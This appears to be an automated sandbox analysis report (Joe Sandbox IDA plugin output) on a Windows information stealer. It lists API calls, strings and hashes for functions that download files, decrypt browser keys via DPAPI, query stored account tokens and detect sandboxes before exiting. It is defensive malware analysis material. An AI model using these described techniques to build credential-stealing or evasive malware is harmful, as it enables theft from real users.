StrCmpCA.SHLWAPI(?,013BE608), ref: 017E5E07
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 017E5E4F
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 017E5E73
InternetReadFile.WININET(017F1E53,?,00000400,?), ref: 017E5E9C
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 017E5ECA
CloseHandle.KERNEL32(?,?,00000400), ref: 017E5F09
InternetCloseHandle.WININET(017F1E53), ref: 017E5F13
InternetCloseHandle.WININET(00000000), ref: 017E5F20

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
String ID:
API String ID: 2507841554-0
Opcode ID: b30e0123e136c01bd2d1a75de289ca6fd57e0adb4657b3f315e57d6657f8909c
Instruction ID: 437ff31f7a9740001ed5e81c236d80dc56f24cfe25247ed6156ce14010a48f25
Opcode Fuzzy Hash: b30e0123e136c01bd2d1a75de289ca6fd57e0adb4657b3f315e57d6657f8909c
Instruction Fuzzy Hash: 665172B594021DAFDF24DF64CC49BEEB7B8AB48305F008099A705AB1C4DB746A86CF65

Function 017EB270 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 274stringCOMMON

Download Yara Rule

APIs

Part of subcall function 017F8560: lstrcpy.KERNEL32(017FE4C7,00000000), ref: 017F85A8

Part of subcall function 017F87D0: lstrlen.KERNEL32(?,017FE98C,?,00000000,017FE4C7), ref: 017F87E5
Part of subcall function 017F87D0: lstrcpy.KERNEL32(00000000), ref: 017F8824
Part of subcall function 017F87D0: lstrcat.KERNEL32(00000000,00000000), ref: 017F8832

Part of subcall function 017F8740: lstrcpy.KERNEL32(00000000,?), ref: 017F8792
Part of subcall function 017F8740: lstrcat.KERNEL32(00000000), ref: 017F87A2

Part of subcall function 017F86C0: lstrcpy.KERNEL32(?,017FE4C7), ref: 017F8725

Part of subcall function 017E9800: memcmp.MSVCRT ref: 017E981B
Part of subcall function 017E9800: memset.MSVCRT ref: 017E984E
Part of subcall function 017E9800: LocalAlloc.KERNEL32(00000040,?), ref: 017E989E

lstrlen.KERNEL32(00000000), ref: 017EB46D

Part of subcall function 017F6D40: LocalAlloc.KERNEL32(00000040,-00000001), ref: 017F6D62

StrStrA.SHLWAPI(00000000,AccountId), ref: 017EB49B
lstrlen.KERNEL32(00000000), ref: 017EB573
lstrlen.KERNEL32(00000000), ref: 017EB587

Strings

SELECT service, encrypted_token FROM token_service, xrefs: 017EB3DB
AccountTokens, xrefs: 017EB339
AccountTokens, xrefs: 017EB2AA
AccountId, xrefs: 017EB492

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$AllocLocallstrcat$memcmpmemset
String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
API String ID: 2910778473-1079375795
Opcode ID: 9b6cbb744b4d7c9a9b949d34a3bcf75ef979c172a1ab8c637598e9486114c0e7
Instruction ID: 8989b437c47476b3708945c17e1202774aa6a05332a225f88d097c1c59fca050
Opcode Fuzzy Hash: 9b6cbb744b4d7c9a9b949d34a3bcf75ef979c172a1ab8c637598e9486114c0e7
Instruction Fuzzy Hash: 91A11E729101099BCF15EBA0DC99EEFF779AF24300F50416DE60662299EF346A49CB73

Function 00B32F60 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 126COMMON

Download Yara Rule

APIs

__libm_sse2_cos_precise.LIBCMT ref: 00B32F71
__libm_sse2_sin_precise.LIBCMT ref: 00B32F84

Part of subcall function 00B32B10: FindResourceA.KERNEL32(00000000,00000002,0000000A), ref: 00B32C5F
Part of subcall function 00B32B10: LoadResource.KERNEL32(00000000,00000000), ref: 00B32C6A
Part of subcall function 00B32B10: SizeofResource.KERNEL32(00000000,00000000), ref: 00B32C79

Strings

P3: (, xrefs: 00B3312E
P2: (, xrefs: 00B330E4
Triangle points:, xrefs: 00B32FD6
P1: (, xrefs: 00B3309A

Memory Dump Source

Source File: 00000000.00000002.2242638566.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2242043905.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242900451.0000000000B42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242930147.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242967351.0000000000B4A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242967351.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242967351.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_jlO7971vUz.jbxd

Similarity

API ID: Resource$FindLoadSizeof__libm_sse2_cos_precise__libm_sse2_sin_precise
String ID: P1: ($P2: ($P3: ($Triangle points:
API String ID: 61787141-683156860
Opcode ID: fa86aae18c0e9b75e9e2f3fe5774c4dc04f8ad118d8c49b3ac010987ed100a40
Instruction ID: d65aba492c186ffea71c4399098de4bc0872d45ceea30147c38440ed597b40b9
Opcode Fuzzy Hash: fa86aae18c0e9b75e9e2f3fe5774c4dc04f8ad118d8c49b3ac010987ed100a40
Instruction Fuzzy Hash: CF41BC25E24F4446C703EF70542222BB2D56FEB3C4F218B97B44A7BA63EF34D6965281

Function 017F4920 Relevance: 10.6, APIs: 7, Instructions: 89sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 017F76E0: GetProcAddress.KERNEL32(75900000,013B3BC8), ref: 017F7721
Part of subcall function 017F76E0: GetProcAddress.KERNEL32(75900000,013B3BE0), ref: 017F773A
Part of subcall function 017F76E0: GetProcAddress.KERNEL32(75900000,013B3C58), ref: 017F7752
Part of subcall function 017F76E0: GetProcAddress.KERNEL32(75900000,013B3DD8), ref: 017F776A
Part of subcall function 017F76E0: GetProcAddress.KERNEL32(75900000,013B3BF8), ref: 017F7783
Part of subcall function 017F76E0: GetProcAddress.KERNEL32(75900000,013B4FC8), ref: 017F779B
Part of subcall function 017F76E0: GetProcAddress.KERNEL32(75900000,013AB5E0), ref: 017F77B3
Part of subcall function 017F76E0: GetProcAddress.KERNEL32(75900000,013AB720), ref: 017F77CC
Part of subcall function 017F76E0: GetProcAddress.KERNEL32(75900000,013B3C10), ref: 017F77E4
Part of subcall function 017F76E0: GetProcAddress.KERNEL32(75900000,013B3C70), ref: 017F77FC
Part of subcall function 017F76E0: GetProcAddress.KERNEL32(75900000,013B3C88), ref: 017F7815
Part of subcall function 017F76E0: GetProcAddress.KERNEL32(75900000,013B3CA0), ref: 017F782D
Part of subcall function 017F76E0: GetProcAddress.KERNEL32(75900000,013AB6A0), ref: 017F7845
Part of subcall function 017F76E0: GetProcAddress.KERNEL32(75900000,013B3CB8), ref: 017F785E

Part of subcall function 017F8560: lstrcpy.KERNEL32(017FE4C7,00000000), ref: 017F85A8

Part of subcall function 017E1190: CreateDCA.GDI32(013B09D8,00000000,00000000,00000000), ref: 017E11A2
Part of subcall function 017E1190: GetDeviceCaps.GDI32(?,0000000A), ref: 017E11B1
Part of subcall function 017E1190: ReleaseDC.USER32(00000000,?), ref: 017E11C0
Part of subcall function 017E1190: ExitProcess.KERNEL32 ref: 017E11D1

Part of subcall function 017E1120: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,017F4947,017FE4C7), ref: 017E112A
Part of subcall function 017E1120: ExitProcess.KERNEL32 ref: 017E113E

Part of subcall function 017E10D0: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,017F494C), ref: 017E10EB
Part of subcall function 017E10D0: VirtualAllocExNuma.KERNEL32(00000000,?,?,017F494C), ref: 017E10F2
Part of subcall function 017E10D0: ExitProcess.KERNEL32 ref: 017E1103

Part of subcall function 017E11E0: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 017E11FE
Part of subcall function 017E11E0: __aulldiv.LIBCMT ref: 017E1218
Part of subcall function 017E11E0: __aulldiv.LIBCMT ref: 017E1226
Part of subcall function 017E11E0: ExitProcess.KERNEL32 ref: 017E1254

Part of subcall function 017F46A0: GetUserDefaultLangID.KERNEL32(?,?,017F4956,017FE4C7), ref: 017F46A4

GetUserDefaultLangID.KERNEL32 ref: 017F4956

Part of subcall function 017E1150: ExitProcess.KERNEL32 ref: 017E1186

Part of subcall function 017F5720: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,017E1177), ref: 017F5750
Part of subcall function 017F5720: HeapAlloc.KERNEL32(00000000,?,?,?,017E1177), ref: 017F5757
Part of subcall function 017F5720: GetUserNameA.ADVAPI32(00000104,00000104), ref: 017F576F

Part of subcall function 017F57B0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,017F495B), ref: 017F57E0
Part of subcall function 017F57B0: HeapAlloc.KERNEL32(00000000,?,?,?,017F495B), ref: 017F57E7
Part of subcall function 017F57B0: GetComputerNameA.KERNEL32(?,00000104), ref: 017F57FF

Part of subcall function 017F87D0: lstrlen.KERNEL32(?,017FE98C,?,00000000,017FE4C7), ref: 017F87E5
Part of subcall function 017F87D0: lstrcpy.KERNEL32(00000000), ref: 017F8824
Part of subcall function 017F87D0: lstrcat.KERNEL32(00000000,00000000), ref: 017F8832

Part of subcall function 017F86C0: lstrcpy.KERNEL32(?,017FE4C7), ref: 017F8725

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,013B09B8,?,017FE988,?,00000000,?,017FE98C,?,00000000,017FE4C7), ref: 017F49FA
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 017F4A18
CloseHandle.KERNEL32(00000000), ref: 017F4A29
Sleep.KERNEL32(00001770), ref: 017F4A34
CloseHandle.KERNEL32(?,00000000,?,013B09B8,?,017FE988,?,00000000,?,017FE98C,?,00000000,017FE4C7), ref: 017F4A4A
ExitProcess.KERNEL32 ref: 017F4A52

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseCreateDefaultEventHandleLangName__aulldiv$CapsComputerCurrentDeviceGlobalInfoMemoryNumaOpenReleaseSleepStatusSystemVirtuallstrcatlstrlen
String ID:
API String ID: 4014759737-0
Opcode ID: d5c184c22861780f993394f74135e9bde9f10190e9f62cfd6c831797b5270bf4
Instruction ID: faf6fb3138c585ba97acc155e5a5f6f515aa1b832fb2f56a263e0fe11b508ee4
Opcode Fuzzy Hash: d5c184c22861780f993394f74135e9bde9f10190e9f62cfd6c831797b5270bf4
Instruction Fuzzy Hash: FC310B7594020AABDF14FBF0D85DBAFF779AF24300F50451CE21262288DF746A058B76

Function 017E4C90 Relevance: 10.6, APIs: 7, Instructions: 81networkmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 017E4CAA
RtlAllocateHeap.NTDLL(00000000), ref: 017E4CB1
InternetOpenA.WININET(017FE7B6,00000000,00000000,00000000,00000000), ref: 017E4CCA
InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 017E4CF1
InternetReadFile.WININET(017F4075,?,00000400,00000000), ref: 017E4D21
InternetCloseHandle.WININET(017F4075), ref: 017E4D95
InternetCloseHandle.WININET(?), ref: 017E4DA2

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
String ID:
API String ID: 3066467675-0
Opcode ID: f251de2a409f073c643099913365e4a61b5ac4f15db49996c9bbb8a04809ecd1
Instruction ID: 956850e25f71683d2b19ebb4e556e9ec934c5b5211d5af4d9292a2dc3d96ec26
Opcode Fuzzy Hash: f251de2a409f073c643099913365e4a61b5ac4f15db49996c9bbb8a04809ecd1
Instruction Fuzzy Hash: 2131D4B4E40218ABDB24CF54DC89BDDB7B4BB48704F5081D8B709A7285DB746AC68F98

Function 017F62AC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 017F62F6
wsprintfA.USER32 ref: 017F6329
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 017F634B
RegCloseKey.ADVAPI32(00000000), ref: 017F635C
RegCloseKey.ADVAPI32(00000000), ref: 017F6369

Part of subcall function 017F85C0: lstrcpy.KERNEL32(?,00000000), ref: 017F8606

RegQueryValueExA.KERNEL32(00000000,013C09E0,00000000,000F003F,?,00000400), ref: 017F63BC
lstrlen.KERNEL32(?), ref: 017F63D1
RegQueryValueExA.KERNEL32(00000000,013C0AA0,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,017FE500), ref: 017F6469
RegCloseKey.KERNEL32(00000000), ref: 017F64D8
RegCloseKey.ADVAPI32(00000000), ref: 017F64EA

Strings

%s\%s, xrefs: 017F631D

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
String ID: %s\%s
API String ID: 3896182533-4073750446
Opcode ID: 7623742d8533ba2908928bc617203c2a3e6e411a6ff49a5f57aa1e1d6f5dbd43
Instruction ID: e91a8145caf6275884eee098427c89f01c90de35c6f9a2bb6b7fd060cd1263cc
Opcode Fuzzy Hash: 7623742d8533ba2908928bc617203c2a3e6e411a6ff49a5f57aa1e1d6f5dbd43
Instruction Fuzzy Hash: 2B21E975A1021C9BDB24DB54DC85FEAB3B9FB48700F00C1DDA609A6244DF75AA86CFA4

Function 017E93C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 017E93EC
GetFileSizeEx.KERNEL32(000000FF,?), ref: 017E9411
LocalAlloc.KERNEL32(00000040,?), ref: 017E9431
ReadFile.KERNEL32(000000FF,?,00000000,017EF9B7,00000000), ref: 017E945A
LocalFree.KERNEL32(017EF9B7), ref: 017E9490
FindCloseChangeNotification.KERNEL32(000000FF), ref: 017E949A

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: File$Local$AllocChangeCloseCreateFindFreeNotificationReadSize
String ID:
API String ID: 1815715184-0
Opcode ID: 98623815dbc623880807447a40b9d82e8d694af480e0a3bd5a1d6de6d12840b0
Instruction ID: 808e06fd0a9ab08c7aa28cd71315e0d1b12d128a965dcb83a8f5de07b7d74b05
Opcode Fuzzy Hash: 98623815dbc623880807447a40b9d82e8d694af480e0a3bd5a1d6de6d12840b0
Instruction Fuzzy Hash: 2B312CB5A00209EFDB15CF98C888FAEBBF5AF49314F108158EA11A7284D774A941CFA1

Function 017E11E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 017E11FE
__aulldiv.LIBCMT ref: 017E1218
__aulldiv.LIBCMT ref: 017E1226
ExitProcess.KERNEL32 ref: 017E1254

Strings

@, xrefs: 017E11F3

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: __aulldiv$ExitGlobalMemoryProcessStatus
String ID: @
API String ID: 3404098578-2766056989
Opcode ID: 43b162ca8b7e53b6e5d1e0114f91ff0f635650c341a57e4a93db2e0f43b57dd1
Instruction ID: 954245c7770ffa3ab36c93e1f1abf85892f3aee6133f186103ef5846fee97865
Opcode Fuzzy Hash: 43b162ca8b7e53b6e5d1e0114f91ff0f635650c341a57e4a93db2e0f43b57dd1
Instruction Fuzzy Hash: CE014FF0E44208FAEB10DBD0CC4EB9EFBF8AB58705F548058E704B6284C67455458B55

Function 00B328D0 Relevance: 7.7, APIs: 5, Instructions: 161sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00B37E6E: rand_s.MSVCRT ref: 00B37E76

memcpy.MSVCRT ref: 00B3290D
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B32A64
Sleep.KERNEL32(-00000001,00000000,?,000F4240,00000000,?,?,000F4240,00000000,05265C00,?,?,00000000), ref: 00B32AA6
Sleep.KERNEL32(00000000,00000000,?,000F4240,00000000,?,?,000F4240,00000000,05265C00,?,?,00000000), ref: 00B32AC9
Sleep.KERNEL32(05265C00,?,?,00000000), ref: 00B32AE4

Memory Dump Source

Source File: 00000000.00000002.2242638566.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000000.00000002.2242043905.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242900451.0000000000B42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242930147.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242967351.0000000000B4A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242967351.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2242967351.0000000000BDB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b30000_jlO7971vUz.jbxd

Similarity

API ID: Sleep$Unothrow_t@std@@@__ehfuncinfo$??2@memcpyrand_s
String ID:
API String ID: 2894727674-0
Opcode ID: c8f79b5b237e90cd11e3fa06a183e72fa22913a2cafeed994dade28f2e7f99aa
Instruction ID: d5adb9f5323d81dd6aaae9b37dac8c72500e1be115d46bf708c028089b813ec5
Opcode Fuzzy Hash: c8f79b5b237e90cd11e3fa06a183e72fa22913a2cafeed994dade28f2e7f99aa
Instruction Fuzzy Hash: 0D518171E002245FDF389B688C816EDB2F5EB44310F7502E9F919A7691DAB06E849B81

Function 017E96E0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 97COMMON

Download Yara Rule

APIs

Part of subcall function 017F8560: lstrcpy.KERNEL32(017FE4C7,00000000), ref: 017F85A8

Part of subcall function 017E93C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 017E93EC
Part of subcall function 017E93C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 017E9411
Part of subcall function 017E93C0: LocalAlloc.KERNEL32(00000040,?), ref: 017E9431
Part of subcall function 017E93C0: ReadFile.KERNEL32(000000FF,?,00000000,017EF9B7,00000000), ref: 017E945A
Part of subcall function 017E93C0: LocalFree.KERNEL32(017EF9B7), ref: 017E9490
Part of subcall function 017E93C0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 017E949A

Part of subcall function 017F6D40: LocalAlloc.KERNEL32(00000040,-00000001), ref: 017F6D62

StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 017E9739

Part of subcall function 017E94C0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,017E4BCE,00000000,00000000), ref: 017E94EF
Part of subcall function 017E94C0: LocalAlloc.KERNEL32(00000040,?,?,?,017E4BCE,00000000,?), ref: 017E9501
Part of subcall function 017E94C0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,017E4BCE,00000000,00000000), ref: 017E952A
Part of subcall function 017E94C0: LocalFree.KERNEL32(?,?,?,?,017E4BCE,00000000,?), ref: 017E953F

memcmp.MSVCRT ref: 017E9792

Part of subcall function 017E9560: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 017E9584
Part of subcall function 017E9560: LocalAlloc.KERNEL32(00000040,00000000), ref: 017E95A3
Part of subcall function 017E9560: LocalFree.KERNEL32(?), ref: 017E95CF

Strings

DPAPI, xrefs: 017E9789
"encrypted_key":", xrefs: 017E9730
, xrefs: 017E97C1

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFileFree$BinaryString$ChangeCloseCreateDataFindNotificationReadSizeUnprotectlstrcpymemcmp
String ID: $"encrypted_key":"$DPAPI
API String ID: 2647593125-738592651
Opcode ID: 083a53de4ed684763f8240ca603c9cc22c682c9e0847069661ab9c595522d2d3
Instruction ID: 8a7f2b2a5e93f88d8660bcb1037a572a0f62f44e9676ad73a08dac9243132ca6
Opcode Fuzzy Hash: 083a53de4ed684763f8240ca603c9cc22c682c9e0847069661ab9c595522d2d3
Instruction Fuzzy Hash: 8A3110B6D102099BDF14DFA4DC899EFF7F8AF58308F14455DEA05A7245EB309A08CBA1

Function 6C44C930 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 6C44C947
VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C44C969
GetSystemInfo.KERNEL32(?), ref: 6C44C9A9
VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C44C9C8
VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C44C9E2

Memory Dump Source

Source File: 00000000.00000002.2271842523.000000006C431000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C430000, based on PE: true

Associated: 00000000.00000002.2271798919.000000006C430000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2272007569.000000006C4AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2272093046.000000006C4BE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2272122694.000000006C4C2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c430000_jlO7971vUz.jbxd

Similarity

API ID: Virtual$AllocInfoSystem$Free
String ID:
API String ID: 4191843772-0
Opcode ID: 703dc36eefb5ffe7e012f398551ac0fcdd5d7306bf751c19ff8e2f630960e378
Instruction ID: 0884ca228c65978dfe57e841ebb41352d97660d5b1884ca51ccd1886016c2e40
Opcode Fuzzy Hash: 703dc36eefb5ffe7e012f398551ac0fcdd5d7306bf751c19ff8e2f630960e378
Instruction Fuzzy Hash: 38210435742214BBEB04FA38DCC4FAE73B9EB46744F64412AF907A7B80DB7058088B94

Function 017F55C0 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 017F55F7
HeapAlloc.KERNEL32(00000000), ref: 017F55FE
RegOpenKeyExA.KERNEL32(80000002,013B7E98,00000000,00020119,?), ref: 017F561E
RegQueryValueExA.KERNEL32(?,013C08F0,00000000,00000000,000000FF,000000FF), ref: 017F563F
RegCloseKey.ADVAPI32(?), ref: 017F5652

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID:
API String ID: 3466090806-0
Opcode ID: ca82e817c3c7d8e59dff54a12f9101c625d59a6102629262286e231c206dddcc
Instruction ID: 5d03ab370867833dc8080b51b1a7a2b421837973888cbb62fe045cf5be0b4635
Opcode Fuzzy Hash: ca82e817c3c7d8e59dff54a12f9101c625d59a6102629262286e231c206dddcc
Instruction Fuzzy Hash: C7116DB5A44209ABDB24CF94E949FBBBB78EB08B10F00411DF615A7284DB7459028BA1

Function 017F5CD0 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON

